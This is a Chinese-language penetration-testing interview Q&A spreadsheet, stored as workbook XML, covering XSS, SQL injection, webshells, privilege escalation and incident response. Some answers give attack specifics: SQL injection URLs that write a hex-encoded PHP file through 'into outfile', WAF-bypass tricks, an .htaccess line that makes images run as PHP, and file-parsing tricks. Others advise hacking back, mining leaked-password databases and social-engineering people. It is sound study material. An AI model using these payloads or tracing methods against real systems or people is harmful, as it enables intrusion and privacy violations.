
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="xml" ContentType="application/xml"/>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700" windowHeight="11520"/>
  </bookViews>
  <sheets>
    <sheet name="互联网搜集" sheetId="1" r:id="rId1"/>
    <sheet name="WpsReserved_CellImgList" sheetId="4" state="veryHidden" r:id="rId2"/>
  </sheets>
  <calcPr calcId="144525"/>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2" name="ID_FB716CFC54B4475D9E9FBC2E92C8C08C" descr="upload_026845465"/>
        <xdr:cNvPicPr/>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip r:embed="rId1"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="2205355" cy="9013825"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
  </etc:cellImage>
  <etc:cellImage>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="3" name="ID_DD6ABF893E4A40A4ACBB2FC38FB998CE" descr="upload_491724891"/>
        <xdr:cNvPicPr/>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip r:embed="rId2"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="7157085" cy="4072255"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
  </etc:cellImage>
  <etc:cellImage>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="4" name="ID_2F4E876901DF4C7497A65BB7BC627B06" descr="upload_902992906"/>
        <xdr:cNvPicPr/>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip r:embed="rId3"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="2074545" cy="1442085"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
  </etc:cellImage>
</etc:cellImages>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="874" uniqueCount="852">
  <si>
    <t>序号</t>
  </si>
  <si>
    <t>回答</t>
  </si>
  <si>
    <t>xss原理？存储型xss如何利用？</t>
  </si>
  <si>
    <t>1.XSS（跨站脚本攻击）又叫CSS (Cross Site Script) ，为了区别层叠样式表（CSS）所以叫XSS。它指的是攻击者往Web页面里插入恶意html代码，当用户浏览该页之时，嵌入其中Web里面的html代码会被执行，从而达到恶意的特殊目的。
2.一、窃取用户的cookie，登陆用户账号。 二、进行社工钓鱼，如弹出来假的后台页面或者弹一个下载flash的木马页面。 三、配合CSRF漏洞进行蠕虫攻击。</t>
  </si>
  <si>
    <t>渗透测试流程</t>
  </si>
  <si>
    <t>1.明确目标    2.分析风险，获得授权    3.信息收集    4.漏洞探测（手动&amp;自动）    5.漏洞验证    6.信息分析    7.利用漏洞，获取数据    8.信息整理    9.形成报告</t>
  </si>
  <si>
    <t>入侵排查思路</t>
  </si>
  <si>
    <t>文件分析
a) 文件日期、新增文件、可疑/异常文件、最近使用文件、浏览器下载文件    b) Webshell 排查与分析    c) 核心应用关联目录文件分析
进程分析
a) 当前活动进程 &amp; 远程连接   b) 启动进程&amp;计划任务   c) 进程工具分析   i. Windows:Pchunter    ii. Linux: Chkrootkit&amp;Rkhunter
系统信息
a) 环境变量    b) 帐号信息    c) History    d) 系统配置文件
日志分析
a) 操作系统日志    i. Windows: 事件查看器（eventvwr）    ii. Linux: /var/log/    b) 应用日志分析    i. Access.log    ii. Error.log</t>
  </si>
  <si>
    <t>weblogic和redis未授权漏洞分别是利用哪个端口</t>
  </si>
  <si>
    <t>weblogic是7001，redis是6379.</t>
  </si>
  <si>
    <t>常见的端口漏洞</t>
  </si>
  <si>
    <t>信息收集都是收集什么</t>
  </si>
  <si>
    <t>方式：主动扫描，开放搜索等。
开放搜索：利用搜索引擎获得：后台、未授权页面、敏感url、等等。
基础信息：IP、网段、域名、端口。
应用信息：各端口的应用。例如web应用、邮件应用、等等。
系统信息：操作系统版本
版本信息：所有这些探测到的东西的版本。
服务信息：中间件的各类信息，插件信息。
人员信息：域名注册人员信息，web应用中发帖人的id，管理员姓名等。以及利用社工库收集管理员的密码信息等。
防护信息：试着看能否探测到防护设备。</t>
  </si>
  <si>
    <t>常见漏洞以及自己的见解，防护手段等</t>
  </si>
  <si>
    <t>https://blog.csdn.net/strive_____/article/details/100716849</t>
  </si>
  <si>
    <t>发现客户被传了webshell如何处置</t>
  </si>
  <si>
    <t>1.先使用webshell查杀工具进行多次查杀。 2.通过webshell文件创建时间点去翻看相关日期的访问日志。 3.通过查看日志进行漏洞分析。
4.修复相关漏洞。</t>
  </si>
  <si>
    <t>获得了攻击者的ip如何进行溯源，获取攻击者的个人信息</t>
  </si>
  <si>
    <t>通过IP端口扫描，反向渗透服务器进行分析，最终定位到攻击者相关信息。</t>
  </si>
  <si>
    <t>有无其他安全产品的使用经验</t>
  </si>
  <si>
    <t>根据个人情况回答。 例：使用过中睿、山石网科、360的一些防火墙产品。</t>
  </si>
  <si>
    <t>如果爆发了0day该如何处理</t>
  </si>
  <si>
    <t>进行补丁下载</t>
  </si>
  <si>
    <t>Linux下权限维持方法</t>
  </si>
  <si>
    <t>https://www.cnblogs.com/-mo-/p/12337766.html</t>
  </si>
  <si>
    <t>内网代理正向与反向</t>
  </si>
  <si>
    <t>https://www.cnblogs.com/taostaryu/p/10547132.html</t>
  </si>
  <si>
    <t>SQL注入JSON接口与白名单</t>
  </si>
  <si>
    <t>https://blog.csdn.net/a15803617402/article/details/82939202</t>
  </si>
  <si>
    <t>redis未授权与权限获取</t>
  </si>
  <si>
    <t>https://www.cnblogs.com/bmjoker/p/9548962.html</t>
  </si>
  <si>
    <t>如何反查真实ip</t>
  </si>
  <si>
    <t>https://www.cnblogs.com/qiudabai/p/9763739.html</t>
  </si>
  <si>
    <t>寻找webshell</t>
  </si>
  <si>
    <t>1、抓取工具特征流量 2.日志分析  3.webshell查杀工具</t>
  </si>
  <si>
    <t>sql注入特征</t>
  </si>
  <si>
    <t>https://blog.csdn.net/m0_54377930/article/details/113139412</t>
  </si>
  <si>
    <t>sql注入利用</t>
  </si>
  <si>
    <t>数据库信息泄漏：数据库中存放的用户的隐私信息的泄露。
网页篡改：通过操作数据库对特定网页进行篡改。
网站被挂马，传播恶意软件：修改数据库一些字段的值，嵌入网马链接，进行挂马攻击。
数据库被恶意操作：数据库服务器被攻击，数据库的系统管理员帐户被窜改。
服务器被远程控制，被安装后门。经由数据库服务器提供的操作系统支持，让黑客得以修改或控制操作系统。</t>
  </si>
  <si>
    <t>SQL二级注入</t>
  </si>
  <si>
    <t>https://www.cnblogs.com/ms0708/p/14044531.html</t>
  </si>
  <si>
    <t>日志中看到的行为分析</t>
  </si>
  <si>
    <t>linux下的敏感文件？</t>
  </si>
  <si>
    <t>https://blog.csdn.net/jb19900111/article/details/18619653?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-3.control&amp;dist_request_id=1328603.386.16148619991812411&amp;depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-3.control</t>
  </si>
  <si>
    <t>如果你查到一个qq号怎么分析攻击者</t>
  </si>
  <si>
    <t xml:space="preserve">1.尝试进入其空间获取其更多信息，或者加上他的好友进行社工。 2.利用社工库查询手机号，通过手机号再反查其他平台，
如支付宝，阿里云等等。  3.案例 https://mp.weixin.qq.com/s/f_TzsgM0ujWL99bEr5aRiQ </t>
  </si>
  <si>
    <t>分别讲述一下服务器、数据库、网站的安全加固</t>
  </si>
  <si>
    <t>1.服务器 https://www.jianshu.com/p/97a2ee6aa9d1?from=timeline  2.数据库https://blog.csdn.net/qq_40907977/article/details/106208435   
3.网站   部署CDN，定期扫描漏洞，上waf，隐藏后台登陆口，关闭不变要的端口。</t>
  </si>
  <si>
    <t>XSS类型都有哪些，什么是dom型xss，如何防御</t>
  </si>
  <si>
    <t xml:space="preserve">XSS（Cross-Site Scripting）又称跨站脚本，XSS的重点不在于跨站点，而是在于脚本的执行。XSS是一种经常出现在 Web 应用程序中的计算机安全漏洞，是由于 Web 应用程序对用户的输入过滤不足而产生的
常见的有三种：反射型、DOM-based 型、存储型。
其中存储型归类为持久型 XSS 攻击，反射型、DOM-based 型可以归类为非持久型 XSS 攻击。
反射型：经过后端，不经过数据库
存储型：经过后端，经过数据库
DOM：不经过后端,DOM—based XSS漏洞是基于文档对象模型Document Objeet Model,DOM)的一种漏洞,dom - xss是通过url传入参数去控制触发的
DOM:客户端的脚本程序可以动态地检查和修改页面内容，而不依赖于服务器端的数据。例如客户端如从 URL 中提取数据并在本地执行，如果用户在客户端输入的数据包含了恶意的 JavaScript 脚本，而这些脚本没有经过适当的过滤和消毒，那么应用程序就可能受到 DOM-based XSS 攻击。需要特别注意以下的用户输入源 document.URL、 location.hash、 location.search、 document.referrer 等
</t>
  </si>
  <si>
    <t>sql注入你都了解什么类型，如何防御</t>
  </si>
  <si>
    <t>最基础的注入-union注入攻击
Boolean注入攻击-布尔盲注
报错注入攻击
时间注入攻击-时间盲注
堆叠查询注入攻击
二次注入攻击
宽字节注入攻击
base64注入攻击
cookie注入攻击-http请求头参数注入
XFF注入攻击-http请求头参数注入
知道绝对路径的注入
https://www.cnblogs.com/-chenxs/p/11614129.html
sql语句预编译和绑定变量，但是不是所有场景都能够采用 sql语句预编译，有一些场景必须的采用 字符串拼接的方式，此时，我们严格检查参数的数据类型，还有可以使用一些安全函数，来方式sql注入
https://blog.csdn.net/qq_35114086/article/details/92830127</t>
  </si>
  <si>
    <t>MS17-010使用的是什么端口</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>永恒之蓝漏洞，通过TCP端口</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>445</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>和</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>139</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>来利用SMBv1和NBT中的远程代码执行漏洞，恶意代码会扫描开放445文件共享端口的Windows机器
，无需用户任何操作，只要开机上网，不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
更多：https://www.freebuf.com/column/193681.html</t>
    </r>
  </si>
  <si>
    <t>假设现在有一台电脑，被MS17-010入侵了，那么你需要怎么做</t>
  </si>
  <si>
    <t>上报，并进行断网隔离</t>
  </si>
  <si>
    <t>冰蝎连接的特征和原理</t>
  </si>
  <si>
    <t xml:space="preserve">冰蝎的通信过程可以分为两个阶段：1、密钥协商2、加密传输
第一阶段-密钥协商
1）攻击者通过 GET 或者 POST 方法，形如 http://127.0.0.1/shell.aspx?pass=645 的请求服务器密钥；
2）服务器使用随机数 MD5 的高16位作为密钥，存储到会话的 $_SESSION 变量中，并返回密钥给攻击者。
第二阶段-加密传输
1）客户端把待执行命令作为输入，利用 AES 算法或 XOR 运算进行加密，并发送至服务端；2）服务端接受密
文后进行 AES 或 XOR 运算解密，执行相应的命令；3）执行结果通过AES加密后返回给攻击者。
冰蝎特征检测
总结冰蝎在流量交互中的特征，这些特征可分为两类。一类是可绕过特征，这类特征攻击者可通过构造报文进行绕
过，致使设备检测不到冰蝎 webshell 特征。另一类是非可绕过特征，攻击者在某些情景无法更改 HTTP 某些字
段，致使有固定报文字段可供设备检测。使用单个特征误报较高，但多个特征配合使用可降低误报，推荐多个特征
搭配使用，进一步提升特征检测的准确性。
详细：https://zhuanlan.zhihu.com/p/135227454
</t>
  </si>
  <si>
    <t>菜刀的原理与特征</t>
  </si>
  <si>
    <t>http://www.pinlue.com/article/2019/03/2707/468432227534.html</t>
  </si>
  <si>
    <t>sql会手工注入嘛，order by和limit后面改怎么写</t>
  </si>
  <si>
    <t>order by是mysql中对查询数据进行排序的方法，后面可以跟列名或一个数字，比如id是user表第一列的列名，那
么填id或1的效果是一样的
LIMIT[位置偏移量,]行数
其中，中括号里面的参数是可选参数，位置偏移量是指MySQL查询分析器要从哪一行开始显示，索引值从0开始，即
第一条记录位置偏移量是0，第二条记录的位置偏移量是1,依此类推...，第二个参数为“行数”即指示返回的记录条数。
limit后面还可以拼接into和produce函数，其中into可以用来写文件，用procedure analyse()这个子查询
而且只能用extractvalue 和 benchmark 函数进行延时</t>
  </si>
  <si>
    <t>mysql提权方式</t>
  </si>
  <si>
    <t xml:space="preserve">udf提权和mof提权
https://blog.csdn.net/he_and/article/details/81434865
https://www.cnblogs.com/hzk001/p/12890919.html
</t>
  </si>
  <si>
    <t>windows下系统日志溯源</t>
  </si>
  <si>
    <t>C:\Windows\System32\winevt\Logs\ *( XP C:\Windows\System32)
应用程序日志 App Event.Evtx(Application.evtx)
安全日志 SecEvent.Evtx
系统日志 SysEvent.Evtx
https://www.freebuf.com/vuls/175560.html</t>
  </si>
  <si>
    <t>linux后门排查</t>
  </si>
  <si>
    <t>https://blog.csdn.net/qq_40907977/article/details/106193136</t>
  </si>
  <si>
    <t>windows有哪些后门及排查</t>
  </si>
  <si>
    <t>系统工具替换后门
文件隐藏
计划任务
开机启动项
服务
waitfor.exe
bitsadmin后门
WMI后门(重点!)
COM劫持
meterpreter 权限维持
Empire persistence模块(重点!!)
进程注入(重点!!)
除了以上的几种后门和权限维持技术外还有像是dll劫持、一些软件的插件后门、office后门等
具体信息： https://blog.csdn.net/qq_33020901/article/details/89504902</t>
  </si>
  <si>
    <t>讲述一个自己印象深刻的渗透经历</t>
  </si>
  <si>
    <t>sqlmap os-shell的原理</t>
  </si>
  <si>
    <t>https://www.cnblogs.com/lcamry/p/5505110.html</t>
  </si>
  <si>
    <t>信息收集</t>
  </si>
  <si>
    <t xml:space="preserve">
服务器的相关信息（真实ip，系统类型，版本，开放端口，WAF等）
网站指纹识别（包括，cms，cdn，证书等），dns记录
whois信息，姓名，备案，邮箱，电话反查（邮箱丢社工库，社工准备等）
google hacking针对化搜索，pdf文件，中间件版本，弱口令扫描等
扫描网站目录结构，爆后台，网站banner，测试文件，备份等敏感文件泄漏等
传输协议，通用漏洞，exp，github源码等
</t>
  </si>
  <si>
    <t>漏洞挖掘</t>
  </si>
  <si>
    <t xml:space="preserve">浏览网站，看看网站规模，功能，特点等
端口，弱口令，目录等扫描,对响应的端口进行漏洞探测，比如 rsync,心脏出血，mysql,ftp,ssh弱口令等。
XSS，SQL注入，上传，命令注入，CSRF，cookie安全检测，敏感信息，通信数据传输，暴力破解，任意文件上传，越权访问，未授权访问，目录遍历，文件 包含，重放攻击（短信轰炸），服务器漏洞检测，最后使用漏扫工具等
</t>
  </si>
  <si>
    <t>漏洞利用 | 权限提升</t>
  </si>
  <si>
    <t xml:space="preserve">mysql提权，serv-u提权，oracle提权
windows 溢出提权
linux脏牛,内核漏洞提权
</t>
  </si>
  <si>
    <t>清除测试数据 | 输出报告</t>
  </si>
  <si>
    <t xml:space="preserve">日志、测试数据的清理
总结，输出渗透测试报告，附修复方案
复测，验证并发现是否有新漏洞，输出报告，归档
</t>
  </si>
  <si>
    <t>在渗透过程中，收集目标站注册人邮箱对我们有什么价值？</t>
  </si>
  <si>
    <t xml:space="preserve">丢社工库里看看有没有泄露密码，然后尝试用泄露的密码进行登录后台。
社工找出社交账号，里面或许会找出管理员设置密码的习惯 。
利用已有信息生成专用字典。
丢社工库里看看有没有泄露密码，然后尝试用泄露的密码进行登录后台。
用邮箱做关键词进行丢进搜索引擎。利用搜索到的关联信息找出其他邮进而得到常用社交账号。
观察管理员常逛哪些非大众性网站，拿下它，你会得到更多好东西。
</t>
  </si>
  <si>
    <t>判断出网站的CMS对渗透有什么意义？</t>
  </si>
  <si>
    <t xml:space="preserve">查找网上已曝光的程序漏洞。
如果开源，还能下载相对应的源码进行代码审计。
CMS是Content Management System的简称，意指"內容智能管理系统"。是web公司网站建设制做常见到的系统软件，应用CMS系统软件能够 为大家快速开发出企业官网。
</t>
  </si>
  <si>
    <t>渗透时扫目录的意义</t>
  </si>
  <si>
    <t xml:space="preserve">敏感文件、二级目录扫描
站长的误操作比如：网站备份的压缩文件、说明.txt、二级目录可能存放着其他站点
查看是否存在敏感信息泄露：如网站的备份文件，上传口，PHPmyadmin等
目录扫描的原理:通过提交一个http的请求来获取的返回包，来查看返回包的信息来判断某个文件或目录的存在(状态码)　　
200 正常返回，404 请求资源不存在，403 请求资源存在，但服务器拒绝访问，500 内部服务器错误
</t>
  </si>
  <si>
    <t>目前已知哪些版本的容器有解析漏洞，具体举例。</t>
  </si>
  <si>
    <t xml:space="preserve">IIS 6.0
/xx.asp/xx.jpg "xx.asp"是文件夹名
IIS 7.0/7.5
默认Fast-CGI开启，直接在url中图片地址后面输入/1.php，会把正常图片当成php解析
Nginx
版本小于等于0.8.37，利用方法和IIS 7.0/7.5一样，Fast-CGI关闭情况下也可利用。
空字节代码 xxx.jpg.php
Apache1.x、2.x
上传的文件命名为：test.php.x1.x2.x3，Apache是从右往左判断后缀
lighttpd
xx.jpg/xx.php
</t>
  </si>
  <si>
    <t>如何手工快速判断目标站是windows还是linux服务器？</t>
  </si>
  <si>
    <t>linux大小写敏感,windows大小写不敏感。</t>
  </si>
  <si>
    <t>为何一个mysql数据库的站，只有一个80端口开放？</t>
  </si>
  <si>
    <t>改了端口,站库分离,3306不对外网开放,防火墙拦截
站库分离的作用：
为了更好的网站安全性，使用云数据库或者自建数据库分离后不容易被扒站，就算网站端或者数据库端被黑客攻击，也不容易泄露全部数据。
阿里云或者腾讯云提供的云数据库RDS等性能比自建数据库强很多。
云数据库都会自带三备份，不容易丢数据。</t>
  </si>
  <si>
    <t>看到编辑器，应该先做什么？</t>
  </si>
  <si>
    <t>查看编辑器的名称版本,然后搜索公开的漏洞。</t>
  </si>
  <si>
    <t>拿到一个webshell发现网站根目录下有.htaccess文件，我们能做什么？</t>
  </si>
  <si>
    <t xml:space="preserve">能做的事情很多，用隐藏网马来举例子：
插入
SetHandler application/x-httpd-php
.jpg文件会被解析成.php文件
</t>
  </si>
  <si>
    <t>提权时选择可读写目录，为何尽量不用带空格的目录？</t>
  </si>
  <si>
    <t>exp执行一般需要空格界定参数</t>
  </si>
  <si>
    <t>后台修改管理员密码处，原密码显示为*。你觉得该怎样实现读出这个用户的密码？</t>
  </si>
  <si>
    <t>审查元素 把密码处的password属性改成text就明文显示了</t>
  </si>
  <si>
    <t>为什么aspx木马权限比asp大</t>
  </si>
  <si>
    <t>aspx使用的是.net技术。IIS 中默认不支持，ASP只是脚本语言而已。入侵的时候asp的木马一般是guest权限…APSX的木马一般是users权限</t>
  </si>
  <si>
    <t>如何绕过waf</t>
  </si>
  <si>
    <t xml:space="preserve">大小写转换法
干扰字符 /*!*/
编码 base64 unicode hex url ascll
复参数
</t>
  </si>
  <si>
    <t>常见端口</t>
  </si>
  <si>
    <t xml:space="preserve">3306 mysql
1433 mssql
1521 oracle
5432 postgresql
6379 redis
27017 mongodb
8080 tomcat/resin/jetty
137 samba
5900 vnc
</t>
  </si>
  <si>
    <t>如何向服务器写入webshell</t>
  </si>
  <si>
    <t xml:space="preserve">各种上传漏洞
mysql具有写入权限,用sql语句写入shell
http put方法
Sql注入
</t>
  </si>
  <si>
    <t>SQL注入原理</t>
  </si>
  <si>
    <t xml:space="preserve">a. SQL（结构化语句查询）
b. 提交参数（调用数据库查询）的地方是用户可控的，并未做任何过滤处理
c. 数字型，字符型，搜索型，POST注入，Cookie注入，延时注入，盲注等
</t>
  </si>
  <si>
    <t>SQL注入防护</t>
  </si>
  <si>
    <t xml:space="preserve">1、使用安全的API
2、对输入的特殊字符进行Escape转义处理
3、使用白名单来规范化输入验证方法
4、对客户端输入进行控制，不允许输入SQL注入相关的特殊字符
5、服务器端在提交数据库进行SQL查询之前，对特殊字符进行过滤、转义、替换、删除。
规范编码,字符集
</t>
  </si>
  <si>
    <t>为什么参数化查询可以防止sql注入</t>
  </si>
  <si>
    <t xml:space="preserve">使用参数化查询数据库服务器不会把参数的内容当作sql指令的一部分来执行，是在数据库完成sql指令的编译后才套用参数运行
简单的说:
参数化能防注入的原因在于,语句是语句，参数是参数，参数的值并不是语句的一部分，数据库只按语句的语义跑
</t>
  </si>
  <si>
    <t>SQL头注入点</t>
  </si>
  <si>
    <t xml:space="preserve">UA
REFERER
COOKIE
IP
</t>
  </si>
  <si>
    <t>盲注是什么？怎么盲注？</t>
  </si>
  <si>
    <t>盲注是在SQL注入攻击过程中，服务器关闭了错误回显，我们单纯通过服务器返回内容的变化来判断是否存在SQL注入和利用的方式。盲注的手段有两种，一个是通过页面的返回内容是否正确(boolean-based)，来验证是否存在注入。一个是通过sql语句处理时间的不同来判断是否存在注入(time-based)，在这里，可以用benchmark，sleep等造成延时效果的函数，也可以通过构造大笛卡儿积的联合查询表来达到延时的目的。</t>
  </si>
  <si>
    <t>宽字节注入产生原理以及根本原因</t>
  </si>
  <si>
    <t xml:space="preserve">产生原理
在数据库使用了宽字符集而WEB中没考虑这个问题的情况下，在WEB层，由于0XBF27是两个字符，在PHP中比如addslash和magic_quotes_gpc开启时，由于会对0x27单引号进行转义，因此0xbf27会变成0xbf5c27,而数据进入数据库中时，由于0XBF5C是一个另外的字符，因此\转义符号会被前面的bf带着”吃掉”，单引号由此逃逸出来可以用来闭合语句。
在哪里编码
根本原因：
character_set_client(客户端的字符集)和character_set_connection(连接层的字符集)不同,或转换函数如，iconv、mb_convert_encoding使用不当。
解决办法：
统一数据库、Web应用、操作系统所使用的字符集，避免解析产生差异，最好都设置为UTF-8。
或对数据进行正确的转义，如mysql_real_escape_string+mysql_set_charset的使用。
</t>
  </si>
  <si>
    <t>sql里面只有update怎么利用</t>
  </si>
  <si>
    <t xml:space="preserve">先理解这句 SQL
UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id'
如果此 SQL 被修改成以下形式，就实现了注入
1：修改 homepage 值为http://baidu.net', userlevel=’3
之后 SQL 语句变为
UPDATE user SET password='mypass', homepage='http://baidu.net', userlevel='3' WHERE id='$id'
userlevel 为用户级别
2:修改 password 值为mypass)’ WHERE username=’admin’#
之后 SQL 语句变为
UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$id'
3：修改 id 值为’ OR username=’admin’
之后 SQL 语句变为
UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='' OR username='admin'
</t>
  </si>
  <si>
    <t>sql如何写shell/单引号被过滤怎么办</t>
  </si>
  <si>
    <t xml:space="preserve">写shell: root权限，GPC关闭，知道文件路径
outfile函数
`http://127.0.0.1:81/sqli.php?id=1 into outfile 'C:\\wamp64\\www\\phpinfo.php' FIELDS TERMINATED BY ''`
`http://127.0.0.1:81/sqli.php?id=-1 union select 1,0x3c3f70687020706870696e666f28293b203f3e,3,4 into outfile 'C:\\wamp64\\www\\phpinfo.php'`
宽字节注入
</t>
  </si>
  <si>
    <t>代替空格的方法</t>
  </si>
  <si>
    <t xml:space="preserve">%0a、%0b、%a0 等
/**/ 等注释符
&lt;&gt;
</t>
  </si>
  <si>
    <t>mysql的网站注入，5.0以上和5.0以下有什么区别？</t>
  </si>
  <si>
    <t xml:space="preserve">5.0以下没有information_schema这个系统表，无法列表名等，只能暴力跑表名。
5.0以下是多用户单操作，5.0以上是多用户多操做。
</t>
  </si>
  <si>
    <t>mysql和sqlserver注入时候的区别</t>
  </si>
  <si>
    <t>发现 demo.jsp?uid=110 注入点，你有哪几种思路获取 webshell，哪种是优选？</t>
  </si>
  <si>
    <t xml:space="preserve">有写入权限的，构造联合查询语句使用using INTO OUTFILE，可以将查询的输出重定向到系统的文件中，这样去写入 WebShell
使用 sqlmap –os-shell 原理和上面一种相同，来直接获得一个 Shell，这样效率更高
通过构造联合查询语句得到网站管理员的账户和密码，然后扫后台登录后台，再在后台通过改包上传等方法上传 Shell
</t>
  </si>
  <si>
    <t xml:space="preserve">某个防注入系统，如何渗透系统检测到你有非法注入的行为。已记录您的ip xx.xx.xx.xx时间:2016:01-23提交页面:test.asp?id=15提交内容:and 1=1如何利用这个防注入系统拿shell？
</t>
  </si>
  <si>
    <t>在URL里面直接提交一句话，这样网站就把你的一句话也记录进数据库文件了 这个时候可以尝试寻找网站的配置文件 直接上菜刀链接</t>
  </si>
  <si>
    <t>如何突破注入时字符被转义？</t>
  </si>
  <si>
    <t xml:space="preserve">宽字符注入
hex编码绕过
</t>
  </si>
  <si>
    <t>mysql注入点，用工具对目标站直接写入一句话，需要哪些条件？</t>
  </si>
  <si>
    <t>root权限以及网站的绝对路径。</t>
  </si>
  <si>
    <t>如果sleep和benchmark关键字被过滤掉了该怎么办？</t>
  </si>
  <si>
    <t xml:space="preserve">1.让两个非常大的数据表做笛卡尔积产生大量的计算从而产生时间延迟
2.如果服务器端采用长连接的话可以利用Mysql的锁机制即Get_lock()
3.利用复杂的正则表达式去匹配一个超长字符串来产生时间延迟
未知列名情况下的注入利用
</t>
  </si>
  <si>
    <t>如果在利用SQL注入的时候遇到了WAF（安全狗3.5版本会直接拦截关键字information_shema），从而无法获取数据表的列名，这时该怎么利用漏洞呢？</t>
  </si>
  <si>
    <t>利用虚表获取数据</t>
  </si>
  <si>
    <t xml:space="preserve">XSS类型 XSS原理
</t>
  </si>
  <si>
    <t xml:space="preserve">反射型
用户提交的数据中可以构造代码来执行，从而实现窃取用户信息等攻击。
需要诱使用户“点击”一个恶意链接，才能攻击成功
储存型
存储型XSS会把用户输入的数据“存储”在服务器端。
这种XSS具有很强的稳定性。
DOM型
通过修改页面的DOM节点形成的XSS，称之为DOM Based XSS。
DOM型和反射型的区别
反射型XSS：通过诱导用户点击，我们构造好的恶意payload才会触发的XSS。
反射型XSS的检测我们在每次请求带payload的链接时页面应该是会带有特定的畸形数据的。
DOM型：通过修改页面的DOM节点形成的XSS。
DOM-based XSS由于是通过js代码进行dom操作产生的XSS，所以在请求的响应中我们甚至不一定会得到相应的畸形数据。
根本区别在我看来是输出点的不同。
DOM型XSS 自动化测试或人工测试
人工测试思路：找到类似document.write、innerHTML赋值、outterHTML赋值、window.location操作、写javascript:后内容、eval、setTimeout 、setInterval 等直接执行之类的函数点。找到其变量，回溯变量来源观察是否可控，是否经过安全函数。
自动化测试参看道哥的博客，思路是从输入入手，观察变量传递的过程，最终检查是否有在危险函数输出，中途是否有经过安全函数。但是这样就需要有一个javascript解析器，否则会漏掉一些通过js执行带入的部分内容。
在回答这段问题的时候，由于平时对客户的检测中，基本是凭借不同功能点的功能加上经验和直觉来进行检测，对不同类型的XSS检测方式实际上并没有太过细分的标准化检测方式，所以回答的很烂。。。
</t>
  </si>
  <si>
    <t xml:space="preserve">如何快速发现xss位置
对于XSS怎么修补建议
</t>
  </si>
  <si>
    <t xml:space="preserve">输入点检查：对用户输入的数据进行合法性检查，使用filter过滤敏感字符或对进行编码转义，针对特定类型数据进行格式检查。针对输入点的检查最好放在服务器端实现。
输出点检查：对变量输出到HTML页面中时，对输出内容进行编码转义，输出在HTML中时，对其进行HTMLEncode，如果输出在Javascript脚本中时，对其进行JavascriptEncode。
对使用JavascriptEncode的变量都放在引号中并转义危险字符，data部分就无法逃逸出引号外成为code的一部分。还可以使用更加严格的方法，对所有数字字母之外的字符都使用十六进制编码。此外，要注意在浏览器中，HTML的解析会优先于Javascript的解析，编码的方式也需要考虑清楚，针对不同的输出点，我们防御XSS的方法可能会不同，这点可能在之后的文章会做下总结。
除此之外，还有做HTTPOnly对Cookie劫持做限制。
</t>
  </si>
  <si>
    <t>XSS蠕虫的产生条件</t>
  </si>
  <si>
    <t>正常情况下，一个是产生XSS点的页面不属于self页面，用户之间产生交互行为的页面，都可能造成XSS Worm的产生。不一定需要存储型XSS</t>
  </si>
  <si>
    <t xml:space="preserve">CSRF
CSRF原理
</t>
  </si>
  <si>
    <t>CSRF是跨站请求伪造攻击，由客户端发起,是由于没有在关键操作执行时进行是否由用户自愿发起的确认
CSRF防御：1.验证Http Referer 字段  2.在请求地址中添加 token 并验证</t>
  </si>
  <si>
    <t>token和referer做横向对比，谁安全等级高？</t>
  </si>
  <si>
    <t xml:space="preserve">token安全等级更高，因为并不是任何服务器都可以取得referer，如果从HTTPS跳到HTTP，也不会发送referer。并且FLASH一些版本中可以自定义referer。
但是token的话，要保证其足够随机且不可泄露。(不可预测性原则)
</t>
  </si>
  <si>
    <t>对referer的验证，从什么角度去做？如果做，怎么杜绝问题?</t>
  </si>
  <si>
    <t xml:space="preserve">对header中的referer的验证，一个是空referer，一个是referer过滤或者检测不完善。
为了杜绝这种问题，在验证的白名单中，正则规则应当写完善。
</t>
  </si>
  <si>
    <t>针对token，对token测试会注意哪方面内容，会对token的哪方面进行测试？</t>
  </si>
  <si>
    <t xml:space="preserve">引用一段请教前辈的回答：
